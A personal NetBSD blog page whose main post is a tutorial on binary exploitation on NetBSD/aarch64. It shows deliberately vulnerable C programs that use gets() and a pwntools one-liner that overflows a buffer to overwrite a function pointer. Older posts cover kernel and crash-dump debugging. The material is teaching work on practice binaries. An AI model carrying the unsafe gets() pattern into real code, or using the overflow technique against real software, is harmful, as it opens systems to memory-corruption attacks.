|
[20260308]
|
pwning NetBSD-aarch64 (ARM)
For some time, I have ventured into low(er)level hacking & cybersecurity at OverTheWire and pwn.college. Today, a LOT of security & hacking is focussed on Linux/x86, but we all know there is more. More operating systems, and more CPUs. In the area of binary exploitation, I wondered if the basic tools for that work on NetBSD/aarch64 (ARM), and I had a look. Spoiler: they do!
Here's an example of pwning on NetBSD/aarch64 (ARM).
Preparation
Step 0: Install NetBSD/aarch64, e.g. in qemu.
Setup the basics:
su root -c pkg_add -v https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/aarch64/11.0_2025Q4/All/pkgin-25.10.0.tgz
su root -c "pkgin install sudo"
sudo pkgin install bash
Install pwntools & friends:
sudo pkgin install python311 # not newer... pwntools...
sudo pkgin install rust
sudo pkgin install cmake pkg-config openssl
sudo pkgin install gmake
sudo pkgin install vim # for xxd, not the shoddy editor that comes with it
When going for pwntools & friends, python 3.11 is the version of choice - newer versions of python are not supported there:
python3.11 -m venv venv-pwn
. ./venv-pwn/bin/activate
pip install "capstone<6" pwntools # same as on macos with angr
Install gef in its usual place, just in case:
sudo mkdir -p /opt/gef
sudo wget https://github.com/hugsy/gef/raw/main/gef.py -O /opt/gef/gef.py
gdb - better colors etc. via .gdbinit (default gdb really looks bad on black terminals):
(venv-pwn) qnetbsd$ cat ~/.gdbinit
#set disassembly-flavor intel # disable on ARM :-)
set follow-fork-mode child
set style address foreground cyan
set style function foreground cyan
set style disassembler immediate foreground cyan
pwn v1
First pwn attempt:
#include <stdio.h>
#include <stdlib.h>
void win(void)
{
printf("Goodbye, winner.\n");
exit(0);
}
void vuln(void)
{
char name[16];
printf("What is your name? ");
gets(name);
printf("Hello %s\n", name);
return;
}
int main(void)
{
vuln();
return 0;
}
Due to differences between x86 and ARM, a simple buffer overflow to overwrite e.g. the return address cannot be done. On ARM, the return address of a function is not stored on the stack but in the X30 register. The crash observed when running this is due to random other values being overwritten.
Let's build and see the security parameters:
(venv-pwn) qemubsd$ gcc -ggdb win1.c -o win1
ld: /tmp//ccdWZtt2.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x34): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec win1
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1'
Arch: aarch64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x200100000)
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
Not that many security features on by default. What's going on, NetBSD?!
Ignoring this for now, let's look at the assembly code:
(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win1
Reading symbols from win1...
Dump of assembler code for function vuln:
0x00000002001009f4 <+0>: stp x29, x30, [sp, #-32]!
0x00000002001009f8 <+4>: mov x29, sp
0x00000002001009fc <+8>: adrp x0, 0x200100000
0x0000000200100a00 <+12>: add x0, x0, #0xaf8
0x0000000200100a04 <+16>: bl 0x200100730 <printf@plt>
0x0000000200100a08 <+20>: add x0, sp, #0x10
0x0000000200100a0c <+24>: bl 0x200100790 <gets@plt>
0x0000000200100a10 <+28>: add x0, sp, #0x10
0x0000000200100a14 <+32>: mov x1, x0
0x0000000200100a18 <+36>: adrp x0, 0x200100000
0x0000000200100a1c <+40>: add x0, x0, #0xb10
0x0000000200100a20 <+44>: bl 0x200100730 <printf@plt>
0x0000000200100a24 <+48>: nop
0x0000000200100a28 <+52>: ldp x29, x30, [sp], #32
0x0000000200100a2c <+56>: ret
End of assembler dump.
(gdb)
Note the STP and LDP instructions which save and restore the X29 (frame pointer) and X30 (return address) registers of the calling function (main). By overwriting them, main's "RET" will do funny things. While this can still be exploited, let's make things a bit easier in the next attempt.
pwn v2
Here we add a function pointer "goodbye" that can be overwritten:
#include <stdio.h>
#include <stdlib.h>
void lose(void)
{
printf("Goodbye, loser.\n");
exit(0);
}
void win(void)
{
printf("Goodbye, winner.\n");
exit(0);
}
void vuln(void)
{
void (*goodbye)(void) = lose;
char name[16];
printf("What is your name? ");
gets(name);
printf("Hello %s\n", name);
goodbye();
return;
}
int main(void)
{
vuln();
return 0;
}
It's pretty obvious what's happening, but for the sake of completeness:
(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.
Let's look at the assembly output again:
(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win2
Reading symbols from win2...
Dump of assembler code for function vuln:
0x0000000200100a10 <+0>: stp x29, x30, [sp, #-48]!
0x0000000200100a14 <+4>: mov x29, sp
0x0000000200100a18 <+8>: adrp x0, 0x200100000
0x0000000200100a1c <+12>: add x0, x0, #0x9d8
0x0000000200100a20 <+16>: str x0, [sp, #40]
0x0000000200100a24 <+20>: adrp x0, 0x200100000
0x0000000200100a28 <+24>: add x0, x0, #0xb38
0x0000000200100a2c <+28>: bl 0x200100730 <printf@plt>
0x0000000200100a30 <+32>: add x0, sp, #0x18
0x0000000200100a34 <+36>: bl 0x200100790 <gets@plt>
0x0000000200100a38 <+40>: add x0, sp, #0x18
0x0000000200100a3c <+44>: mov x1, x0
0x0000000200100a40 <+48>: adrp x0, 0x200100000
0x0000000200100a44 <+52>: add x0, x0, #0xb50
0x0000000200100a48 <+56>: bl 0x200100730 <printf@plt>
=> 0x0000000200100a4c <+60>: ldr x0, [sp, #40] <===
=> 0x0000000200100a50 <+64>: blr x0 <===
0x0000000200100a54 <+68>: nop
0x0000000200100a58 <+72>: ldp x29, x30, [sp], #48
0x0000000200100a5c <+76>: ret
End of assembler dump.
(gdb)
Note the LDR and BLR instructions at 0x0000000200100a4c - The X0 register is loaded with our function pointer by LDR, and BLR does the actual call.
By overwriting the pointer, we can call another function. Let's use pwn cyclic to find out what's actually in x0 at the time of the BLR call:
(venv-pwn) qnetbsd$ pwn cyclic 100 >c
(venv-pwn) qnetbsd$ gdb -q -ex 'set pagination off' -ex 'b *0x0000000200100a50' -ex 'run <c' -ex 'i r x0' win
Reading symbols from win...
Breakpoint 1 at 0x200100a50: file win.c, line 25.
Starting program: /home/feyrer/tmp/win <c
What is your name? Hello aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Breakpoint 1, 0x0000000200100a50 in vuln () at win.c:25
25 goodbye();
x0 0x6161616661616165 7016996786768273765
(gdb) ! pwn cyclic -l 0x6161616661616165
16
(gdb) print win
$1 = {void (void)} 0x2001009f4 <win>
The function pointer is 16 bytes from the start of our name buffer, and we have the address of the win function. So let's construct our input:
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: f409 1000 0200 0000 ........
Looks good, so call it:
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
Success
Voila, ARM pwnage on NetBSD! :-)
Summary:
(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
I'm positively impressed by the whole toolchain working as expected, given that e.g. pwntools starts compiling rust when installing. Well done, NetBSD!
On security & compiler flags
Of course you can enable all the security flags shown above,
with the proper gcc flags:
(venv-pwn) qemubsd$ gcc -ggdb -fstack-protector-all -fpie -pie -Wl,-z,relro,-z,now win1.c -o win1-prot
ld: /tmp//ccE3ncle.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x64): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec win1-prot
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1-prot'
Arch: aarch64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
Exploiting this binary is left as an exercise to the reader.
[Tags: aarch64, amd, binaryexploit, ctf, gdb, netbsd, pwn, pwntools]
|
|
[20080915]
|
Debugging NetBSD kernel with qemu
Alexander Shishkin has written some
posted
instructions on how to debug a NetBSD kernel running
in qemu with gdb. He reminds how to build NetBSD,
provides a shell script for making a bootable disk,
and explains the magic on how to run qemu and connect
gdb to it. An example session shows how to load the
kernel, set a breakpoint, and examine registers and
variables when the breakpoint is reached.
[Tags: debugging, gdb, qemu]
|
|
[20061115]
|
Post mortem debugging, or: what happened before it crashed? (Updated)
So your machine paniced, and as you were running X you have no
clue what went on? Here's a nice way to find out, assuming you have
a kernel crash dump. To ensure the latter, set
kern.dump_on_panic=1 in /etc/sysctl.conf.
Now, what to do with those crashdumps?
% ls -l /var/crash/
total 3183838
-rw-r--r-- 1 root wheel 3 Nov 2 02:09 bounds
-rw-r--r-- 1 root wheel 5 Jun 30 2004 minfree
...
-rw------- 1 root wheel 181265401 Nov 2 02:11 netbsd.26.core.gz
-rw------- 1 root wheel 2162696 Nov 2 02:11 netbsd.26.gz
In /var/crash, "bounds" contains an increasing counter for the
crashdump number (it would be "27" in the above example),
and "minfree" contains the minimum amount of free space
in kilobytes that should keep free - both files are read by
savecore(8) when /etc/rc.conf has "savecore=yes", which is
the default.
The actual crashdump consists of two gzipped files - the
actual memory dump "netbsd.XX.core.gz" and a copy of the
running kernel "netbsd.xx.gz". After uncompressing the
files can be used for looking at the system at the point
of it's panic:
# gunzip netbsd.26*.gz
#
Note that the crashdump may contain sensitive data and is such
only readable by root!
The crashdump can be read by programs that use libkvm to
read through the crashdump's kernel memory, e.g.
gdb(1), dmesg(8), ps(1), fstat(8), ipcs(1), netstat(8), nfsstat(8),
pmap(1), w(1), pstat(8), vmstat(8) etc.,
using the -M and -N switches.
Some examples:
- To show the system's message buffer at the time
of the crash:
% dmesg -M netbsd.26.core -N netbsd.26
...
unmounting /home (/dev/wd1e)...
unmounting /tmp (mfs:371)...warning: mfs read during shutdown
dev = 0xff00, block = 10496, fs = /tmp
panic: blkfree: freeing free block
Begin traceback...
uvm_fault(0xcbfd07f0, 0x2000, 1) -> 0xe
fatal page fault in supervisor mode
trap type 6 code 0 eip c0305083 cs 8 eflags 10246 cr2 2900 ilevel 0
panic: trap
Faulted in mid-traceback; aborting...
dumping to dev 0,1 offset 2024327
dump 511 510 509 508 507 506 505 504 503 502 501 500 499 498 497 496
495 494 493 ...
Apparently the system tried to free a block that was
already fred here when umounting /tmp.
- Display virtual memory parameters:
% vmstat -M netbsd.26.core -N netbsd.26 -s
4096 bytes per page
8 page colors
127888 pages managed
...
- Attach the GNU debugger gdb(1) to the system crash dumpQ,
to poke around deeply:
% gdb netbsd.26
...
(gdb) target kcore netbsd.26.core
panic: blkfree: freeing free block
#0 0x0ac04000 in ?? ()
(gdb) bt
#0 0x0ac04000 in ?? ()
#1 0xc03084b5 in cpu_reboot ()
#2 0xc02a57aa in panic ()
#3 0xc0313127 in trap ()
#4 0xc0102dfd in calltrap ()
#5 0xc0182544 in db_get_value ()
#6 0xc03058f1 in db_stack_trace_print ()
#7 0xc02a577c in panic ()
#8 0xc0205db7 in ffs_blkfree ()
#9 0xc020b8d5 in ffs_indirtrunc ()
...
- Unfortunately there are a number of programs that I
didn't get to work with my crashdump, but that may be
due to its point after/during system shutdown, e.g.
ps(1) didn't work.
Still that should give some start for poking around...
Update: Apparently 'target kcore' was renamed
to 'target kvm' in gdb6, see
this posting.
[Tags: debugging, dmesg, gdb]
|
|
[20060729]
|
Enabling separate debug symbol support for gdb6
NetBSD-current got an update to the latest GNU debugger,
gdb6, recently. That version allows keeping the debug
information for a binary in a seperate file, thus not
bloating every client's filesystem while still being able
to keep debugging symbols around in some place.
Luke Mewburn has sent a
proposal
to enable this in NetBSD, and he has
committed
code now that allows setting "MKDEBUG=yes" to put seperate debugging
symbols into /usr/libdata/debug.
This is currently not enabled by default, but maybe someone
finds this useful, wants to test it and give some feedback.
[Tags: debugging, gdb]
|
|
Tags: ,
2bsd,
34c3,
3com,
501c3,
64bit,
aarch64,
acl,
acls,
acm,
acorn,
acpi,
acpitz,
adobe,
adsense,
Advocacy,
advocacy,
advogato,
aes,
afs,
aiglx,
aio,
airport,
alereon,
alex,
alix,
alpha,
altq,
am64t,
amazon,
amd,
amd64,
anatomy,
ansible,
apache,
apm,
apple,
arkeia,
arla,
arm,
art,
Article,
Articles,
ascii,
asiabsdcon,
aslr,
asterisk,
asus,
atf,
ath,
atheros,
atmel,
audio,
audiocodes,
autoconf,
avocent,
avr32,
aws,
axigen,
azure,
backup,
balloon,
banners,
basename,
bash,
bc,
beaglebone,
benchmark,
bigip,
binaryexploit,
bind,
blackmouse,
bldgblog,
blog,
blogs,
blosxom,
bluetooth,
board,
bonjour,
books,
boot,
boot-z,
bootprops,
bozohttpd,
bs2000,
bsd,
bsdca,
bsdcan,
bsdcertification,
bsdcg,
bsdforen,
bsdfreak,
bsdmac,
bsdmagazine,
bsdnexus,
bsdnow,
bsdstats,
bsdtalk,
bsdtracker,
bug,
build.sh,
busybox,
buttons,
bzip,
c-jump,
c99,
cafepress,
calendar,
callweaver,
camera,
can,
candy,
capabilities,
card,
carp,
cars,
cauldron,
ccc,
ccd,
cd,
cddl,
cdrom,
cdrtools,
cebit,
centrino,
cephes,
cert,
certification,
cfs,
cgd,
cgf,
checkpointing,
china,
christos,
cisco,
cloud,
clt,
cobalt,
coccinelle,
codian,
colossus,
common-criteria,
community,
compat,
compiz,
compsci,
concept04,
config,
console,
contest,
copyright,
core,
cortina,
coverity,
cpu,
cradlepoint,
cray,
crosscompile,
crunchgen,
cryptography,
csh,
ctf,
cu,
cuneiform,
curses,
curtain,
cuwin,
cvs,
cvs-digest,
cvsup,
cygwin,
daemon,
daemonforums,
daimer,
danger,
darwin,
data,
date,
dd,
debian,
debugging,
dell,
desktop,
devd,
devfs,
devotionalia,
df,
dfd_keeper,
dhcp,
dhcpcd,
dhcpd,
dhs,
diezeit,
digest,
digests,
dilbert,
dirhash,
disklabel,
distcc,
dmesg,
Docs,
Documentation,
donations,
draco,
dracopkg,
dragonflybsd,
dreamcast,
dri,
driver,
drivers,
drm,
dsl,
dst,
dtrace,
dvb,
ec2,
eclipse,
eeepc,
eeepca,
ehci,
ehsm,
eifel,
elf,
em64t,
embedded,
Embedded,
emips,
emulate,
encoding,
envsys,
eol,
espresso,
etcupdate,
etherip,
euca2ools,
eucalyptus,
eurobsdcon,
eurosys,
Events,
exascale,
ext3,
f5,
facebook,
falken,
fan,
faq,
fatbinary,
features,
fefe,
ffs,
filesystem,
fileysstem,
firefox,
firewire,
fireworks,
flag,
flash,
flashsucks,
flickr,
flyer,
fmslabs,
force10,
fortunes,
fosdem,
fpga,
freebsd,
freedarwin,
freescale,
freex,
freshbsd,
friendlyAam,
friendlyarm,
fritzbox,
froscamp,
fsck,
fss,
fstat,
ftp,
ftpd,
fujitsu,
fun,
fundraising,
funds,
funny,
fuse,
fusion,
g4u,
g5,
galaxy,
games,
gcc,
gdb,
gentoo,
geode,
getty,
gimstix,
git,
gnome,
google,
google-soc,
googlecomputeengine,
gpio,
gpl,
gprs,
gracetech,
gre,
groff,
groupwise,
growfs,
grub,
gumstix,
guug,
gzip,
hackathon,
hackbench,
hal,
hanoi,
happabsd,
hardware,
Hardware,
haze,
hdaudio,
heat,
heimdal,
hf6to4,
hfblog,
hfs,
history,
hosting,
hotplug,
hp,
hp700,
hpcarm,
hpcsh,
hpux,
html,
httpd,
hubertf,
hurd,
i18n,
i386,
i386pkg,
ia64,
ian,
ibm,
ids,
ieee,
ifwatchd,
igd,
iij,
image,
images,
imx233,
imx7,
information,
init,
initrd,
install,
intel,
interix,
internet2,
interview,
interviews,
io,
ioccc,
iostat,
ipbt,
ipfilter,
ipmi,
ipplug,
ipsec,
ipv6,
irbsd,
irc,
irix,
iscsi,
isdn,
iso,
isp,
itojun,
jail,
jails,
japanese,
java,
javascript,
jetson,
jibbed,
jihbed,
jobs,
jokes,
journaling,
kame,
kauth,
kde,
kerberos,
kergis,
kernel,
keyboardcolemak,
kirkwood,
kitt,
kmod,
kolab,
kvm,
kylin,
l10n,
landisk,
laptop,
laptops,
law,
ld.so,
ldap,
lehmanns,
lenovo,
lfs,
libc,
license,
licensing,
linkedin,
links,
linksys,
linux,
linuxtag,
live-cd,
lkm,
localtime,
locate.updatedb,
logfile,
logging,
logo,
logos,
lom,
lte,
lvm,
m68k,
mac,
macmini,
macppc,
macromedia,
magicmouse,
mahesha,
mail,
makefs,
malo,
mame,
manpages,
marvell,
matlab,
maus,
max3232,
mbr95,
mbuf,
mca,
mdns,
mediant,
mediapack,
meetbsd,
mercedesbenz,
mercurial,
mesh,
meshcube,
mfs,
mhonarc,
microkernel,
microsoft,
midi,
mini2440,
miniroot,
minix,
mips,
mirbsd,
missile,
mit,
mixer,
mobile-ip,
modula3,
modules,
money,
mouse,
mp3,
mpls,
mprotect,
mtftp,
mult,
multics,
multilib,
multimedia,
music,
mysql,
named,
nas,
nasa,
nat,
ncode,
ncq,
ndis,
nec,
nemo,
neo1973,
netbook,
netboot,
netbsd,
netbsd.se,
nethack,
nethence,
netksb,
netstat,
netwalker,
networking,
neutrino,
nforce,
nfs,
nis,
npf,
npwr,
nroff,
nslu2,
nspluginwrapper,
ntfs-3f,
ntp,
nullfs,
numa,
nvi,
nvidia,
nycbsdcon,
office,
ofppc,
ohloh,
olimex,
olinuxino,
olpc,
onetbsd,
openat,
openbgpd,
openblocks,
openbsd,
opencrypto,
opendarwin,
opengrok,
openmoko,
openoffice,
openpam,
openrisk,
opensolaris,
openssl,
or1k,
oracle,
oreilly,
oscon,
osf1,
osjb,
paas,
packages,
pad,
pae,
pam,
pan,
panasonic,
parallels,
pascal,
patch,
patents,
pax,
paypal,
pc532,
pc98,
pcc,
pci,
pdf,
pegasos,
penguin,
performance,
pexpect,
pf,
pfsync,
pgx32,
php,
pie,
pike,
pinderkent,
pkg_install,
pkg_select,
pkgin,
pkglint,
pkgmanager,
pkgsrc,
pkgsrc.se,
pkgsrcCon,
pkgsrccon,
Platforms,
plathome,
pleiades,
pocketsan,
podcast,
pofacs,
politics,
polls,
polybsd,
portability,
posix,
postinstall,
power3,
powernow,
powerpc,
powerpf,
pppoe,
precedence,
preemption,
prep,
presentations,
prezi,
Products,
products,
proplib,
protectdrive,
proxy,
ps,
ps3,
psp,
psrset,
pthread,
ptp,
ptyfs,
Publications,
puffs,
puredarwin,
pwn,
pwntools,
pxe,
qemu,
qnx,
qos,
qt,
quality-management,
quine,
quote,
quotes,
r-project,
ra5370,
radio,
radiotap,
raid,
raidframe,
rants,
raptor,
raq,
raspberrypi,
rc.d,
rc2,
readahead,
realtime,
record,
refuse,
reiserfs,
Release,
releases,
Releases,
releng,
reports,
resize,
restore,
ricoh,
rijndael,
rip,
riscos,
rng,
roadmap,
robopkg,
robot,
robots,
roff,
rootserver,
rotfl,
rox,
rs323,
rs6k,
rss,
ruby,
rump,
rzip,
sa,
safenet,
san,
sata,
savin,
sbsd,
scampi,
scheduler,
scheduling,
schmonz,
sco,
screen,
script,
sdf,
sdtemp,
secmodel,
security,
Security,
sed,
segvguard,
seil,
sendmail,
serial,
serveraptor,
sfu,
sge,
sgi,
sgimips,
sh,
sha2,
shark,
sharp,
shisa,
shutdown,
sidekick,
size,
slackware,
slashdot,
slides,
slit,
smbus,
smp,
sockstat,
soekris,
softdep,
softlayer,
software,
solaris,
sony,
sound,
source,
source-changes,
spanish,
sparc,
sparc64,
spider,
spreadshirt,
spz,
squid,
ssh,
sshfs,
ssp,
statistics,
stereostream,
stickers,
storage,
stty,
studybsd,
subfile,
sudbury,
sudo,
summit,
sun,
sun2,
sun3,
sunfire,
sunpci,
support,
sus,
suse,
sushi,
susv3,
svn,
swcrypto,
symlinks,
sysbench,
sysctl,
sysinst,
sysjail,
syslog,
syspkg,
systat,
systrace,
sysupdate,
t-shirt,
tabs,
talks,
tanenbaum,
tape,
tcp,
tcp/ip,
tcpdrop,
tcpmux,
tcsh,
teamasa,
tegra,
teredo,
termcap,
terminfo,
testdrive,
testing,
tetris,
tex,
TeXlive,
thecus,
theopengroup,
thin-client,
thinkgeek,
thorpej,
threads,
time,
time_t,
timecounters,
tip,
tk1,
tme,
tmp,
tmpfs,
tnf,
toaster,
todo,
toolchain,
top,
torvalds,
toshiba,
touchpanel,
training,
translation,
tso,
tty,
ttyrec,
tulip,
tun,
tuning,
uboot,
ucom,
udf,
ufs,
ukfs,
ums,
unetbootin,
unicos,
unix,
updating,
upnp,
uptime,
usb,
usenix,
useradd,
userconf,
userfriendly,
usermode,
usl,
utc,
utf8,
uucp,
uvc,
uvm,
valgrind,
vax,
vcfe,
vcr,
veriexec,
vesa,
video,
videos,
virtex,
virtualization,
vm,
vmware,
vnd,
vobb,
voip,
voltalinux,
vpn,
vpnc,
vulab,
w-zero3,
wallpaper,
wapbl,
wargames,
wasabi,
webcam,
webfwlog,
wedges,
wgt624v3,
wiki,
willcom,
wimax,
window,
windows,
winmodem,
wireless,
wizd,
wlan,
wordle,
wpa,
wscons,
wstablet,
X,
x.org,
x11,
x2apic,
xbox,
xcast,
Xen,
xen,
xfree,
xfs,
xgalaxy,
xilinx,
xkcd,
xlockmore,
xmms,
xmp,
xorg,
xscale,
youos,
youtube,
zaurus,
zdump,
zfs,
zlib
'nuff.
Grab the RSS-feed,
index,
or go back to my regular NetBSD page
Disclaimer: All opinion expressed here is purely my own.
No responsibility is taken for anything.
